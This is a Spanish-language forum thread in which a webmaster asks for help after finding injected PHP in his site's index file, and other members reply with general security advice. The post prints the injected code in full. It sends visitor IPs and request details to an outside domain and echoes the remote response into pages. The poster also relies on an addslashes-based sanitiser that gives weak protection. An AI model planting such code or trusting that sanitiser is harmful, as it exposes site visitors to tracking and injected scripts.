Seguridad contra hackeo

Hola a todos,

Desde hace unos dias vengo presentando problemas con la seguridad de mi web en php, pues a la hora de acceder el firewall me bloquea una dirección saliente, me he quedado un poco extrañado al desconocer de que se trataba, revisando el código del index, me he encontrado con que me habían añadido código php por arte de magia, el código es el siguiente:

<?php
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
$stCurlHandle = curl_init('http://botstatistic.com/StatE/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainnam e='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']));
} else
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
$stCurlHandle = curl_init('http://botstatistic.com/StatE/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainnam e='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']));
}
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = curl_exec($stCurlHandle);
curl_close($stCurlHandle);
echo $sResult; // Statistic code end
?>

Lo que he visto es que ese código genera en la ejecución código javascript. He realizado las supuestas pruebas contra inyección y en teoría el servidor no tiene problemas, además he añadido en las primera lineas de código la siguiente función:

<?php
function addslashes__recursive($var){
if (!is_array($var))
return addslashes($var);
$new_var = array();
foreach ($var as $k => $v)$new_var[addslashes($k)]=addslashes__recursive($v);
return $new_var;
}
$_POST=addslashes__recursive($_POST);
$_GET=addslashes__recursive($_GET);
$_REQUEST=addslashes__recursive($_REQUEST);
$_SERVER=addslashes__recursive($_SERVER);
$_COOKIE=addslashes__recursive($_COOKIE);
?>

con todo y esto aún me siguen hackeando los archivos. He buscado información acerca de dicho ataque, pero no he encontrado mucha información al respecto. Alguien conoce alguna manera de protección? muchas gracias por la ayuda que me podáis dar.

Saludos,

Has revisado el tema de permisos?

Cerrar puertos..

Un saludo!

Cambia contraseñas y comentaselo a tu proveedor de hosting.

Ok, pondré en marcha vuestros consejos. Gracias.

Saludos,

Podría ser que te atacaran con XSS ([url]http://es.wikipedia.org/wiki/XSS[/url]), con JS se pueden hacer muchísimas cosas, enter ella editar y obtener la información de archivos y carpetas.

Otra podría ser que tu hosting tuviera alguna vulnerabilidad y consiguieron acceso al server, y después cambiaron todos los archivos PHP que encontraron.

En una ocasión a un sitio que realicé le cambiaron el contenido a TODOS los index.php, pero fue por que alguien logró acceder al servidor (el sitio estaba hosteado en un servidor compartido). El acceso directo al código php casi siempre es problema del servidor más que de otra cosa.

Bueno pasate por la OWASP que tienen una guia para seguir de las 10 vulnerabilidades mas peligrosas y comunes, tal vez tu sitios sea vulnerable ...

https://www.owasp.org/index.php/Cate...op_Ten_Project

Por otro lado no estaría de mas que cambies las contraseñas y revises los permisos como bien te han dicho ya apare de realizar exhaustivamente una búsqueda en tu site eso incluye las imágenes ... si pueden ocultar un script back door con una exención jpg en un ataque RIF

lee esa guía que te dará una buena idea ..

algunos servidores gratuitos meten codigo extra al final o al comienzo, solo por cuestiones de estadisticas tales como web0000, pero si tu server es pago, no deberia estar pasando